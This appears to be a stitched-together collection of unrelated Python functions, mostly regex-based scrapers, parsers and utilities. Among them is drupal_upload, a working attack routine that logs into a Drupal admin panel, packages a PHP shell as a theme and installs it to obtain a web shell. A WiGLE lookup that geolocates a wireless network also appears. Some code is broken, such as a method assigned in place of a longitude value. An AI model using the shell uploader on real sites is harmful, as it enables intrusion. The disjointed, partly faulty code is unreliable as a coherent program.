def getCategoryUrl(site="",url=""): catDb = openTable(tableName=global_setting['catTable']) r = session.get(url) if not r.text: return False soup = BeautifulSoup(r.text) for level1 in soup.select('.classify_books'): curLevel1 = level1.select('.classify_title')[0].text curLevel1 = re.sub('\s', '', curLevel1) for level2 in level1.select('.classify_kind'): curLevel2 = level2.select('.classify_kind_name')[0].text curLevel2 = re.sub('\s', '', curLevel2) for level3 in level2.select('ul li a'): #curLevel3 = re.sub('\s', '', level3.text) curLevel3 = level3.text.strip() curlUrl = level3['href'] retFind = re.findall(r'\/cp(.*)\.html',curlUrl) if retFind: curCatID = retFind[0] catType = 'book' else: retFind = re.findall(r'\/cid(.*)\.html',curlUrl) if retFind: curCatID = retFind[0] catType = 'nonbook' if retFind: if catDb.find({'catId':curCatID}).count() >0: logger.debug('catetogy %s exists,skip\n'%(curCatID)) else: catDb.insert({'catId':curCatID,'level1':curLevel1, 'level2':curLevel2, 'level3':curLevel3, 'catUrl':curlUrl,'catType':catType, 'site':site}) return True
def DownloadUpdate(self, file): self.log('Downloading: %s' % file) dirfile = os.path.join(self.UpdateTempDir,file) dirname, filename = os.path.split(dirfile) if not os.path.isdir(dirname): try: os.makedirs(dirname) except: self.log('Error creating directory: ' +dirname) url = self.SVNPathAddress+urllib.quote(file) try: if re.findall(".xbt",url): self.totalsize = int(re.findall("File length: ([0-9]*)",urllib2.urlopen(url+"?view=log").read())[0]) urllib.urlretrieve( url.decode("utf-8"), dirfile.decode("utf-8")) else: urllib.urlretrieve( url.decode("utf-8"), dirfile.decode("utf-8") ) self.DownloadedFiles.append(urllib.unquote(url)) return 1 except: try: time.sleep(2) if re.findall(".xbt",url): self.totalsize = int(re.findall("File length: ([0-9]*)",urllib2.urlopen(url+"?view=log").read())[0]) urllib.urlretrieve(url.decode("utf-8"), dirfile.decode("utf-8")) else: urllib.urlretrieve(url.decode("utf-8"), dirfile.decode("utf-8") ) urllib.urlretrieve(url.decode("utf-8"), dirfile.decode("utf-8")) self.DownloadedFiles.append(urllib.unquote(url)) return 1 except: self.log("Download failed: %s" % url) self.DownloadFailedFiles.append(urllib.unquote(url)) return 0
def same_url(raw_url1, raw_url2): """Check if 2 URLs refer to the same primary resource `urltools.compare()` fails if the 2 URLs have different fragments. See issue #8 for details. The function treats a special case where the path is simply '/blog' to accommodate some blogs that refer to their posts via the fragment. Args: url1 (str): First URL to be compared url2 (str): Second URL Returns: bool: Whether the URLs are the same """ arxiv_exception = 'arxiv.org' fragment_identifier = '#' url1 = _parse_url(raw_url1) url2 = _parse_url(raw_url2) # If it's on arxiv, do some acrobatics if url1['netloc'] == url2['netloc'] == arxiv_exception: regex = '([^/a-z]+\.[^/a-z.]+)' return re.findall(regex, url1['path']) == re.findall(regex, url2['path']) else: return urltools.compare(_normalize_url(raw_url1), _normalize_url(raw_url2))
def update_lyrics(request): b = open('./artistList.txt', 'r') bb = b.read() b.close() bbb = bb.split(chr(10)) for ar in bbb: if ar.split('=')[1] == '1': return index(request) furl = "/"+ar.split('=')[1]+".htm" ar = ar.split('=')[0] artxt = '' #req = urllib2.Request(u"http://mojim.com/"+ar+".html?t1") #print "connected >> http://mojim.com/"+ar+".html?t1" #response = urllib2.urlopen(req) #result = response.read() print '--',furl,'--' if len(furl) > 0: req2 = urllib2.Request("http://mojim.com"+furl) response2 = urllib2.urlopen(req2) result2 = response2.read() furl2 = re.findall('/tw[0-9x]*.htm', result2) iii = -1 if len(furl2) > 0: for furl3 in furl2: iii = iii + 1 if iii % 2 == 0: continue try: req3 = urllib2.Request("http://mojim.com"+furl3) response3 = urllib2.urlopen(req3) result3 = response3.read() lasturl = re.findall('<dl><dt><br /><br />[^^]*</div>', result3) #a = raw_input() artxt = lasturl[0].replace('更多更詳盡歌詞','').replace(u'在 ','').replace(u'Mojim.com','').replace(u'※','').replace('魔鏡歌詞網','') aaaaaaaa = re.findall(u'title="歌詞(.*)">', artxt) bbbbbbbb = re.findall('<dd><br />(.*)</dd>', artxt) bCnt = len(bbbbbbbb) for bi in range(0, bCnt): if len(bbbbbbbb[bi]) > 22: lv = LyricsView() ll = striphtml(bbbbbbbb[bi].encode('Shift_JIS').replace('<br />', '\r')) ll = ll[:len(ll)-24] lv.setParams({'artist':ar,'title':aaaaaaaa[bi],'lyrics':ll}) lv.save() except: pass '''a = open(u''+ar+'.html', 'w') a.write(artxt) a.close()''' return index(request)
def ident_author(name, pp=prompt_possibles): orig_name = name name = ''.join(re.findall('[A-Z0-9]+',name.upper())) best_authors = [] with open('sample_data/author_names.json', 'r') as f: j = json.load(f) for b in j['results']['bindings']: author_orig = b['name']['value'] uri = b['author']['value'] author = b['name']['value'].upper() subnames = author_orig.split() author = ''.join(re.findall('[A-Z0-9]+',author)) dist = jaccard_ngram_dist(name,author,3) best_authors.append(((author_orig,uri),dist)) if len(subnames)>=2: for sname in [subnames[0], subnames[-1]]: sname = ''.join(re.findall('[A-Z0-9]+',sname)) dist = jaccard_ngram_dist(name,sname,3) best_authors.append(((author_orig,uri),dist)) if len(best_authors)>20: best_authors.sort(key=lambda x:x[1]) best_authors = best_authors[:5] best_authors.sort(key=lambda x:x[1]) best_authors = best_authors[:5] best_dist = best_authors[0][1] possibles = [best_authors[0][0]] for author, dist in best_authors[1:]: percent_diff = (dist-best_dist)*2/float(dist+best_dist) if percent_diff < __CUTOFF__: possibles.append(author) if len(possibles)>1: identified = pp(orig_name, possibles) else: identified = possibles[0] return identified
def run_query(self, query): '''Run a query, returning the results as a list of dictionaries When unknown output is encountered, OsqueryUnknownException is thrown. When osqueryi returns an error, OsqueryException is thrown. ''' query = query + ';' # Extra semicolon causes no harm result = self.run_command(query) # On Mac, the query appears first in the string. Remove it if so. result = re.sub(re.escape(query), '', result).strip() result_lines = result.splitlines() if len(result_lines) < 1: raise OsqueryUnknownException( 'Unexpected output:\n %s' % result_lines) if result_lines[0].startswith(self.ERROR_PREFIX): raise OsqueryException(result_lines[0]) try: header = result_lines[1] columns = re.findall('[^ |]+', header) rows = [] for line in result_lines[3:-1]: values = re.findall('[^ |]+', line) rows.append( dict((col, val) for col, val in zip(columns, values))) return rows except: raise OsqueryUnknownException( 'Unexpected output:\n %s' % result_lines)
def summary_up_result(result_file, ignore, row_head, column_mark): """ Use to summary the monitor or other kinds of results. Now it calculates the average value for each item in the results. It fits to the records that are in matrix form. @result_file: files which need to calculate @ignore: pattern for the comment in results which need to through away @row_head: pattern for the items in row @column_mark: pattern for the first line in matrix which used to generate the items in column Return: A dictionary with the average value of results """ head_flag = False result_dict = {} column_list = {} row_list = [] fd = open(result_file, "r") for eachLine in fd: if len(re.findall(ignore, eachLine)) == 0: if len(re.findall(column_mark, eachLine)) != 0 and not head_flag: column = 0 _, row, eachLine = re.split(row_head, eachLine) for i in re.split("\s+", eachLine): if i: result_dict[i] = {} column_list[column] = i column += 1 head_flag = True elif len(re.findall(column_mark, eachLine)) == 0: column = 0 _, row, eachLine = re.split(row_head, eachLine) row_flag = False for i in row_list: if row == i: row_flag = True if row_flag is False: row_list.append(row) for i in result_dict: result_dict[i][row] = [] for i in re.split("\s+", eachLine): if i: result_dict[column_list[column]][row].append(i) column += 1 fd.close() # Calculate the average value average_list = {} for i in column_list: average_list[column_list[i]] = {} for j in row_list: average_list[column_list[i]][j] = {} check = result_dict[column_list[i]][j][0] if utils_misc.aton(check) or utils_misc.aton(check) == 0.0: count = 0 for k in result_dict[column_list[i]][j]: count += utils_misc.aton(k) average_list[column_list[i]][j] = "%.2f" % (count / len(result_dict[column_list[i]][j])) return average_list
def weatherReport(): htmlfile = urllib.urlopen('http://www.weather.com/weather/today/Mahomet+IL+61853:4:US') htmltext = htmlfile.read() rnTemp = '<span itemprop="temperature-fahrenheit">(.+?)</span>' conditions = '<div class="wx-phrase ">(.+?)</div>' tonightTemp = '<div class="wx-temperature">(.+?)</div>' rntPattern = re.compile(rnTemp) conditionsPattern = re.compile(conditions) tonightTempPattern = re.compile(tonightTemp) rntInstance = re.findall(rntPattern, htmltext) conditionsInstance = re.findall(conditionsPattern, htmltext) tonightTempInstance = re.findall(tonightTempPattern, htmltext) currentConditions = conditionsInstance[0] tonightConditions = conditionsInstance[2] currentTemp = rntInstance[0] tonightTemp = tonightTempInstance[2][:2] print currentTemp to = ['*****@*****.**', '*****@*****.**'] sender = 'weather.bot1' subject = 'Your Daily Weather Forecast is Here' bodymsg = "Right now: " + currentTemp +' degrees.' + ' ' + currentConditions + '.' + "\n" +"Tonight: " + \ tonightTemp + ' degrees.' + ' ' + tonightConditions + '.\n\n' + "Read more about today's weather here: "\ "http://www.weather.com/weather/today/Mahomet+IL+61853:4:US" + "\n" + "This message was mad by request via WeatherBot.\nHave a great day." for address in to: createMessage(address, '*****@*****.**', 'skytower', subject, bodymsg) return
def wigle_print(username, password, netid): browser = mechanize.Browser() browser.open('http://wigle.net') reqData = urllib.urlencode({'credential_0': username, 'credential_1': password}) browser.open('https://wigle.net//gps/gps/main/login', reqData) params = {} params['netid'] = netid reqParams = urllib.urlencode(params) respURL = 'http://wigle.net/gps/gps/main/confirmquery/' resp = browser.open(respURL, reqParams).read() mapLat = 'N/A' mapLon = 'N/A' rLat = re.findall(r'maplat=.*\&', resp) if rLat: mapLat = rLat[0].split('&')[0].split('=')[1] rLon = re.findall(r'maplon=.*\&', resp) if rLon: mapLon = rLon[0].split print '[-] Lat: ' + mapLat + ', Lon: ' + mapLon
def _strip_and_unquote_list( keys, value ): if value[0] == '"': # double-quoted values m = _DQV.match( value ) if m: value = m.groups()[0] values = re.findall( _DQ_L_VALUE, value ) elif value[0] == "'": # single-quoted values m = _SQV.match( value ) if m: value = m.groups()[0] values = re.findall( _SQ_L_VALUE, value ) else: # unquoted values # (may contain internal quoted strings with list delimiters inside 'em!) m = _DQV.match( value ) if m: value = m.groups()[0] else: n = _SQV.match( value ) if n: value = n.groups()[0] values = list(_unquoted_list_parse( keys, value )) # allow trailing commas if values[-1] == '': values = values[0:-1] return values
def test_list(self): # list apps and get their names child = pexpect.spawn("{} apps".format(DEIS)) child.expect('=== Apps') child.expect(pexpect.EOF) apps_before = re.findall(r'([-_\w]+) {\w?}', child.before) # create a new app self.assertIsNotNone(self.formation) child = pexpect.spawn("{} apps:create --formation={}".format( DEIS, self.formation)) child.expect('done, created ([-_\w]+)') app = child.match.group(1) child.expect(pexpect.EOF) # list apps and get their names child = pexpect.spawn("{} apps".format(DEIS)) child.expect('=== Apps') child.expect(pexpect.EOF) apps = re.findall(r'([-_\w]+) {\w?}', child.before) # test that the set of names contains the previous set self.assertLess(set(apps_before), set(apps)) # delete the app child = pexpect.spawn("{} apps:destroy --app={} --confirm={}".format( DEIS, app, app)) child.expect('done in ', timeout=5 * 60) child.expect(pexpect.EOF) # list apps and get their names child = pexpect.spawn("{} apps:list".format(DEIS)) child.expect('=== Apps') child.expect(pexpect.EOF) apps = re.findall(r'([-_\w]+) {\w?}', child.before) # test that the set of names is equal to the original set self.assertEqual(set(apps_before), set(apps))
def parse_cpu_time(time): #return number of micro second # time may be '12m53s', or '0.01s' hour_match = re.findall(r'\d+h', time) minute_match = re.findall(r'\d+m', time) sec_match = re.findall(r'[0-9]+\.*[0-9]*s', time) if len(hour_match) == 0: hour = 0 else: hour = int(hour_match[0][:-1]) if len(minute_match) == 0: minute = 0 else: minute = int(minute_match[0][:-1]) if len(sec_match) == 0: sec = 0 else: sec = float(sec_match[0][:-1]) # Return time in unit of ms (microsecond) time_ret = int((sec + (minute * 60) + (hour * 3600)) * 1000) return time_ret
def __search(self, titles, year, season='0'): try: query = self.search_link % (urllib.quote_plus(titles[0])) query = urlparse.urljoin(self.base_link, query) t = [cleantitle.get(i) for i in set(titles) if i] y = ['%s' % str(year), '%s' % str(int(year) + 1), '%s' % str(int(year) - 1), '0'] r = client.request(query) r = dom_parser.parse_dom(r, 'div', attrs={'class': 'list_movies'}) r = dom_parser.parse_dom(r, 'div', attrs={'class': 'item_movie'}) r = dom_parser.parse_dom(r, 'h2', attrs={'class': 'tit'}) r = dom_parser.parse_dom(r, 'a', req='href') r = [(i.attrs['href'], i.content.lower()) for i in r if i] r = [(i[0], i[1], re.findall('(.+?) \(*(\d{4})', i[1])) for i in r] r = [(i[0], i[2][0][0] if len(i[2]) > 0 else i[1], i[2][0][1] if len(i[2]) > 0 else '0') for i in r] r = [(i[0], i[1], i[2], re.findall('(.+?)\s+(?:\s*-?\s*(?:season|s))\s*(\d+)', i[1])) for i in r] r = [(i[0], i[3][0][0] if len(i[3]) > 0 else i[1], i[2], i[3][0][1] if len(i[3]) > 0 else '0') for i in r] r = [(i[0], i[1], i[2], '1' if int(season) > 0 and i[3] == '0' else i[3]) for i in r] r = sorted(r, key=lambda i: int(i[2]), reverse=True) # with year > no year r = [i[0] for i in r if cleantitle.get(i[1]) in t and i[2] in y and int(i[3]) == int(season)][0] return source_utils.strip_domain(r) except: return
def drupal_upload(url, login, pwd): print '[*] Trying to install theme with shell.' dpl_sess = drupal_admin(url, login, pwd) info = 'name = '+globals.SHELL_NAME+'\ndescription = '+globals.SHELL_NAME+'\npackage = public-action\nversion = VERSION\ncore = 7.x\nfiles[] = '+globals.SHELL_EXT page = dpl_sess.get(url+"?q=admin/appearance/install") token1 = re.findall('<input type="hidden" name="form_build_id" value="(.*?)" />',page.text) token2 = re.findall('<input type="hidden" name="form_token" value="(.*?)" />',page.text) if (token1 == []) or (token2 == []): print '[-] Failed to get token. Login or password incorrect or not supported Drupal version.' sys.exit() post = {'form_build_id' : str(token1[0]), 'form_token' : str(token2[0]), 'form_id' : 'update_manager_install_form', 'op' : 'Install'} print '[*] Creating %s.zip in current folder.' % (globals.SHELL_NAME) arch = zipfile.ZipFile(globals.SHELL_NAME+".zip", 'w') arch.writestr(globals.SHELL_NAME+"/"+globals.SHELL_EXT, globals.PHP_EXEC) arch.writestr(globals.SHELL_NAME+"/"+globals.SHELL_NAME+".info",info) arch.close() file = {'files[project_upload]' : (globals.SHELL_NAME+".zip",open(globals.SHELL_NAME+".zip",'rb'),'application/zip')} print '[*] Trying to upload zip file.' up = dpl_sess.post(url+"?q=admin/appearance/install",files=file,data=post,timeout=None) get_link = re.findall('URL=(.*?)" />',up.text) if not get_link: print '[-] Failed to upload zip file. Try one more time.' sys.exit() link = str(get_link[0]).replace('&','&') dpl_sess.get(link) shell = url+"sites/all/themes/"+globals.SHELL_NAME+"/"+globals.SHELL_EXT check = dpl_sess.get(shell) if check.status_code == 200: return shell else: print '[-] Themes or tmp directories is not writable.' sys.exit()
def __load_testdata(file): """ Reads the testdata out of a file. Testdata consists of exactly three strings on each line, each one enclosed in quotation marks (" or '). The first is the filename to be parsed, the second is the series name that should be parsed out of it, and the third is the issue number string that should be parsed out of it. Blank lines and lines that begin with # are ignored. """ retval = [] if File.Exists(file): with StreamReader(file, Encoding.UTF8, False) as sr: line = sr.ReadLine() while line is not None: line = line.strip() if len(line) > 0 and not line.startswith("#"): if line.startswith('"'): data = re.findall(r'"(.*?)"', line) else: data = re.findall(r"'(.*?)'", line) if len(data) == 3: data.append("") if len(data) != 4: raise Exception("badly formatted test data"); retval.append( data ) line = sr.ReadLine() return retval
def process_line_exceptions(line, extra_tags): global except_base_tag if not ' ' in line or re.match('.*[а-яіїєґ]/.*', line): return line if re.match('^[^ ]+ [^ ]+ [^:]?[a-z].*$', line): return line if line.startswith('# !'): except_base_tag = re.findall('![a-z:-]+', line)[0][1:] + ':' return '' base = re.findall('^[^ ]+', line)[0] except_base_tag2 = except_base_tag if base.endswith('ся'): except_base_tag2 = except_base_tag.replace('verb:', 'verb:rev:') out_line = re.sub('([^ ]+) ?', '\\1 ' + base + ' ' + except_base_tag2 + 'unknown' + extra_tags + '\n', line) if except_base_tag in ('verb:imperf:', 'verb:perf:'): base_add = 'inf:' # if base.endswith('ся'): # base_add = 'rev:' + base_add out_line = re.sub("(verb:(?:rev:)?)((im)?perf:)", "\\1inf:\\2", out_line, 1) out_lines = out_line.split('\n') out_lines[0] = out_lines[0].replace(':unknown', '') out_line = '\n'.join(out_lines) return out_line[:-1]
def get_episode(self,url): html = self.fetch_url(url) divs = re.findall(r'<div id="fenji_\d+_(asc|\d+)"(.*?)<\/div>', html) result = [] if divs: for div in divs: # 链接 第N集 小标题 r = re.findall(r'<h3><a href="(.*?)" target="_blank" title=".*?">.*?(第\d+集)<\/a></h3><h4>(.+?)</h4>', div[1]) if r: #电视剧 for ep_data in r: result.append({"title":ep_data[1] + " " + ep_data[2], "img":"", "url":ep_data[0]}) else: # 链接 标题 小标题 期数(日期) r = re.findall(r'<h3><a href="(.*?)" target="_blank" title="(.*?)">(.*?)<\/a></h3><h4>(.+?)期</h4>', div[1]) if r: #综艺 for ep_data in r: dateA = ep_data[3].split("-") date = "" if len(dateA) == 3: #2012-08-12 date = "%s.%s.%s" % (dateA[2],dateA[1],dateA[0]) result.append({"title":ep_data[1] + " " + ep_data[2], "img":"", "url":ep_data[0], "date":date}) return result #aa = IkankanResolver("http://data.movie.kankan.com/movie/38534?id=731018")
def LISTSHOWS(murl,channel,index=False): link=main.OPENURL(murl) link=link.replace('\r','').replace('\n','').replace('\t','').replace(' ','') match = re.findall('<div class="titleline"><h2 class="forumtitle"><a href="(.+?)">(.+?)</a></h2></div>',link) label='TV Shows' if not len(match) > 0: match = re.findall('<h3 class="threadtitle">.+?<a class=".+?" href="(.+?)" id=".+?">(.+?)</a></h3>', link) label = 'Movies' dialogWait = xbmcgui.DialogProgress() ret = dialogWait.create('Please wait until ' + label + ' Show list is cached.') totalLinks = len(match) loadedLinks = 0 remaining_display = label + ' loaded :: [B]'+str(loadedLinks)+' / '+str(totalLinks)+'[/B].' dialogWait.update(0, '[B]Will load instantly from now on[/B]',remaining_display) xbmc.executebuiltin("XBMC.Dialog.Close(busydialog,true)") for url,name in match: if "color" in name: name=name.replace('<b><font color=red>','[COLOR red]').replace('</font></b>','[/COLOR]') name=name.replace('<b><font color="red">','[COLOR red]').replace('</font></b>','[/COLOR]') if label == 'Movies': main.addDirX(name, MainUrl+url,39,'',searchMeta=True, metaType='Movies') else: main.addTVInfo(name,MainUrl+url,38,getShowImage(channel,name),'','') loadedLinks = loadedLinks + 1 percent = (loadedLinks * 100)/totalLinks remaining_display = label + ' loaded :: [B]'+str(loadedLinks)+' / '+str(totalLinks)+'[/B].' dialogWait.update(percent,'[B]Will load instantly from now on[/B]',remaining_display) if dialogWait.iscanceled(): return False dialogWait.close() del dialogWait xbmcplugin.setContent(int(sys.argv[1]), label) main.VIEWS()
def LISTEPISODES(tvshowname,url): link=main.OPENURL(url) link=link.replace('\r','').replace('\n','').replace('\t','').replace(' ','') match = re.findall('<a class=".+?" href="(.+?)" id=".+?">(.+?)</a>',link) dialogWait = xbmcgui.DialogProgress() ret = dialogWait.create('Please wait until ['+tvshowname+'] Episodes are cached.') totalLinks = len(match) loadedLinks = 0 remaining_display = 'Episodes loaded :: [B]'+str(loadedLinks)+' / '+str(totalLinks)+'[/B].' dialogWait.update(0, '[B]Will load instantly from now on[/B]',remaining_display) xbmc.executebuiltin("XBMC.Dialog.Close(busydialog,true)") for url,name in match: if "Online" not in name: continue name=name.replace(tvshowname,'').replace('Watch Online','') name=main.removeNonASCII(name) main.addTVInfo(name,MainUrl+url,39,'','','') loadedLinks = loadedLinks + 1 percent = (loadedLinks * 100)/totalLinks remaining_display = 'Episodes loaded :: [B]'+str(loadedLinks)+' / '+str(totalLinks)+'[/B].' dialogWait.update(percent,'[B]Will load instantly from now on[/B]',remaining_display) if dialogWait.iscanceled(): return False match=re.findall('<div id="above_threadlist" class="above_threadlist">(.+?)</div>',link) for string in match: match1=re.findall('<a href="(.+?)" title="(.+?)">[0-9]+</a>', string) for url, page in match1: main.addTVInfo(page,MainUrl+url,38,'','','') dialogWait.close() del dialogWait xbmcplugin.setContent(int(sys.argv[1]), 'TV Shows') main.VIEWS()
def memory(inp): """memory -- Displays the bot's current memory usage.""" if os.name == "posix": # get process info status_file = open('/proc/self/status').read() s = dict(re.findall(r'^(\w+):\s*(.*)\s*$', status_file, re.M)) # get the data we need and process it data = s['VmRSS'], s['VmSize'], s['VmPeak'], s['VmStk'], s['VmData'] data = [float(i.replace(' kB', '')) for i in data] strings = [convert_kilobytes(i) for i in data] # prepare the output out = "Threads: \x02{}\x02, Real Memory: \x02{}\x02, Allocated Memory: \x02{}\x02, Peak " \ "Allocated Memory: \x02{}\x02, Stack Size: \x02{}\x02, Heap " \ "Size: \x02{}\x02".format(s['Threads'], strings[0], strings[1], strings[2], strings[3], strings[4]) # return output return out elif os.name == "nt": cmd = 'tasklist /FI "PID eq %s" /FO CSV /NH' % os.getpid() out = os.popen(cmd).read() memory = 0 for amount in re.findall(r'([,0-9]+) K', out): memory += float(amount.replace(',', '')) memory = convert_kilobytes(memory) return "Memory Usage: \x02{}\x02".format(memory) else: return "Sorry, this command is not supported on your OS."
def compile_formula(formula, verbose=False): """Compile formula into a function. Also return letters found, as a str, in same order as parms of function. The first digit of a multi-digit number can't be 0. So if YOU is a word in the formula, and the function is called with Y eqal to 0, the function should return False.""" # modify the code in this function. letters = ''.join(set(re.findall('[A-Z]', formula))) print letters first_letters = set(re.findall('([A-Z])[A-Z]', formula)) print first_letters checklist = ['%s!=0' % (w) for w in first_letters] checklist.append('1==1') print checklist check = ' and '.join(checklist) print check parms = ', '.join(letters) print parms tokens = map(compile_word, re.split('([A-Z]+)', formula)) print tokens body = ''.join(tokens) print body f = 'lambda %s: %s and (%s)' % (parms, body, check) if verbose: print f return eval(f), letters
def parse_current_docket(docket_record): # grab the file with the URL mangled slightly to grab 100k records docket_file = urllib2.urlopen(docket_record['url'] + "&ctl00_ctl00_cphContentMain_MainContent_gvCommentListChangePage=1_100000").read() page = pq(etree.fromstring(docket_file, parser)) docket = dict(docket_record) docket['title'] = page('.dyn_wrap h1').text().strip() assert docket['title'], 'no title found' headers = [item.text().strip() for item in page('.rgMasterTable thead th').items()] docket['comments'] = [] # check if there's a no-records message if len(page('.rgMasterTable .rgNoRecords')): return docket for row in page('.rgMasterTable tbody tr').items(): tds = row.find('td') cell_text = [item.text().strip() for item in tds.items()] cdata = dict(zip(headers, cell_text)) link = pq(tds[-1]).find('a') doc = { 'url': urlparse.urljoin(docket['url'], link.attr('href')), 'details': {}, 'release': [fix_spaces(cdata['Release'])], 'date': cdata['Date Received'], 'doctype': 'public_submission', } vc_matches = re.findall(r"ViewComment\.aspx\?id=(\d+)", doc['url']) if vc_matches: doc['id'] = vc_matches[0] doc['subtype'] = 'comment' detail_columns = ['Organization', 'First Name', 'Last Name'] else: ep_matches = re.findall(r"ViewExParte\.aspx\?id=(\d+)", doc['url']) if ep_matches: doc['id'] = "EP-%s" % ep_matches[0] doc['subtype'] = 'exparte' detail_columns = ['Organization'] else: assert False, "expected either comment or exparte link: %s" % doc['url'] for rdg_label, cftc_label in (('Organization Name', 'Organization'), ('First Name', 'First Name'), ('Last Name', 'Last Name')): if cftc_label in detail_columns and cdata[cftc_label]: doc['details'][rdg_label] = cdata[cftc_label] docket['comments'].append(doc) assert len(docket['comments']) < 100000, "we probably exceeded one page" # then strip out all the ones that aren't about this document release = fix_spaces(page('a[id*=rptReleases_hlReleaseLink]').text().strip()) docket['comments'] = [comment for comment in docket['comments'] if comment['release'][0] == release] return docket
def extractSrcFileData(self, path): fileinput.close() isLocListener = False wakeLockAcqRegex = "invoke-virtual(.*?)Landroid/os/PowerManager$WakeLock;->acquire()" domRegex = "invoke-virtual(.*?)Ljavax/xml/parsers/DocumentBuilderFactory;->newDocumentBuilder()" saxRegex = "invoke-virtual(.*?)Ljavax/xml/parsers/SAXParserFactory;->newSAXParser()" xmlppRegex = "invoke-static(.*?)Landroid/util/Xml;->newPullParser()" for line in fileinput.input([path]): matches = re.findall(wakeLockAcqRegex, line) if len(matches) > 0: self.numNoTimeoutWakeLocks = self.numNoTimeoutWakeLocks + 1 if line.startswith(".implements Landroid/location/LocationListener;"): self.numLocListeners = self.numLocListeners + 1 isLocListener = True if isLocListener: if "\"gps\"" in line: self.numGpsUses = self. numGpsUses + 1 matches = re.findall(domRegex, line) if len(matches) > 0: self.numDomParser = self.numDomParser + 1 matches = re.findall(saxRegex, line) if len(matches) > 0: self.numSaxParser = self.numSaxParser + 1 matches = re.findall(xmlppRegex, line) if len(matches) > 0: self.numXMLPullParser = self.numXMLPullParser + 1
def _real_extract(self, url): video_id = self._match_id(url) webpage = self._download_webpage(url, video_id) title = self._html_search_meta('title', webpage, 'title', fatal=True) TITLE_SUFFIX = ' - TeacherTube' if title.endswith(TITLE_SUFFIX): title = title[:-len(TITLE_SUFFIX)].strip() description = self._html_search_meta('description', webpage, 'description') if description: description = description.strip() quality = qualities(['mp3', 'flv', 'mp4']) media_urls = re.findall(r'data-contenturl="([^"]+)"', webpage) media_urls.extend(re.findall(r'var\s+filePath\s*=\s*"([^"]+)"', webpage)) media_urls.extend(re.findall(r'\'file\'\s*:\s*["\']([^"\']+)["\'],', webpage)) formats = [ { 'url': media_url, 'quality': quality(determine_ext(media_url)) } for media_url in set(media_urls) ] self._sort_formats(formats) return { 'id': video_id, 'title': title, 'thumbnail': self._html_search_regex(r'\'image\'\s*:\s*["\']([^"\']+)["\']', webpage, 'thumbnail'), 'formats': formats, 'description': description, }
def evalAtom(self, atom, param_names): if atom in self.consts: return '(const _%s)'%atom elif atom in param_names: return '(param (paramref \"%s\"))'%atom elif re.match(r'^\d+$', atom): return '(const (intc %s))'%atom elif atom.lower() in ['true', 'false']: return '(const (boolc %s))'%atom.lower() elif re.match(r'^forall.*end$', atom) or re.match(r'^exists.*?end$', atom): if re.match(r'^forall.*end$', atom): params, text = re.findall(r'forall(.*?)do(.*)end', atom)[0] else: params, text = re.findall(r'exists(.*?)do(.*)end', atom)[0] param_name_dict, param_defs = analyzeParams(params) for p in param_names: if p not in param_name_dict: param_name_dict[p] = 0 text = self.splitText(text) sub_form = self.evaluate(self.process(text), param_name_dict) if re.match(r'^forall.*?end$', atom): return '(forallFormula %s %s)'%(param_defs, sub_form) else: return '(existFormula %s %s)'%(param_defs, sub_form) else: return '(var %s)'%self.evalVar(atom)
def __get_dom_elements(item, name, attrs): if not attrs: pattern = '(<%s(?:\s[^>]*>|/?>))' % (name) this_list = re.findall(pattern, item, re.M | re.S | re.I) else: last_list = None for key, value in attrs.iteritems(): value_is_regex = isinstance(value, re_type) value_is_str = isinstance(value, basestring) pattern = '''(<{tag}[^>]*\s{key}=(?P<delim>['"])(.*?)(?P=delim)[^>]*>)'''.format(tag=name, key=key) re_list = re.findall(pattern, item, re.M | re. S | re.I) if value_is_regex: this_list = [r[0] for r in re_list if re.match(value, r[2])] else: temp_value = [value] if value_is_str else value this_list = [r[0] for r in re_list if set(temp_value) <= set(r[2].split(' '))] if not this_list: has_space = (value_is_regex and ' ' in value.pattern) or (value_is_str and ' ' in value) if not has_space: pattern = '''(<{tag}[^>]*\s{key}=((?:[^\s>]|/>)*)[^>]*>)'''.format(tag=name, key=key) re_list = re.findall(pattern, item, re.M | re. S | re.I) if value_is_regex: this_list = [r[0] for r in re_list if re.match(value, r[1])] else: this_list = [r[0] for r in re_list if value == r[1]] if last_list is None: last_list = this_list else: last_list = [item for item in this_list if item in last_list] this_list = last_list return this_list
def showCovers_adddetail_csfd(self, data, title): title_s = re.findall('<title>(.*?)\|', data, re.S) if title_s: if title_s[0] != "Vyhled\xc3\xa1v\xc3\xa1n\xc3\xad ": csfd_title = title_s[0] else: csfd_title = title print "EMC csfd: Movie name - %s" % csfd_title else: csfd_title = title bild = re.findall('<img src="(//img.csfd.cz/files/images/film/posters/.*?|//img.csfd.cz/posters/.*?)" alt="poster"', data, re.DOTALL | re.IGNORECASE) if bild: print "EMC csfd: Cover Select - %s" % title self.cover_count = self.cover_count + 1 csfd_url = "http:" + bild[0].replace('\\','').strip() self.menulist.append(showCoverlist(csfd_title, csfd_url, self.o_path, "csfd: ")) self["info"].setText((_("found") + " %s " + _("covers")) % (self.cover_count)) bild = re.findall('<h3>Plak.*?ty</h3>(.*?)</table>', data, re.S) if bild: bild1 = re.findall('style=\"background-image\: url\(\'(.*?)\'\)\;', bild[0], re.DOTALL | re.IGNORECASE) if bild1: for each in bild1: print "EMC csfd: Cover Select - %s" % title self.cover_count = self.cover_count + 1 csfd_url = "http:" + each.replace('\\','').strip() self.menulist.append(showCoverlist(csfd_title, csfd_url, self.o_path, "csfd: ")) self["info"].setText((_("found") + " %s " + _("covers")) % (self.cover_count)) else: print "EMC csfd 3 : no else covers - %s" % title else: print "EMC csfd 2 : no else covers - %s" % title else: print "EMC csfd 1 : keine infos gefunden - %s" % title
def ReadProtonCounts(inchi): import re #Get inchi layers layers = inchi.split('/') ProtLayer = '' FixedLayer = '' for l in layers[1:]: if 'C' in l and 'H' in l: atoms = re.findall(r"[a-zA-Z]+", l) indexes = [int(x) for x in re.findall(r"\d+", l)] formula = [list(x) for x in zip(atoms, indexes)] if 'h' in l and ProtLayer != '': FixedLayer = l[1:] if 'h' in l and ProtLayer == '': ProtLayer = l[1:] #initialize proton list nheavy = sum([x[1] for x in formula if x[0] != 'H']) #Find, save and remove tautomeric portions from main proton layer tautomerics = re.findall(r"\(.*?\)", ProtLayer) ProtLayer = re.sub(r"\(.*?\)", "", ProtLayer) if ProtLayer[-1] == ',': ProtLayer = ProtLayer[:-1] #Read the main and the fixed proton layer protons = ReadPSections(ProtLayer, nheavy) fprotons = ReadPSections(FixedLayer, nheavy) return protons, formula, tautomerics, fprotons
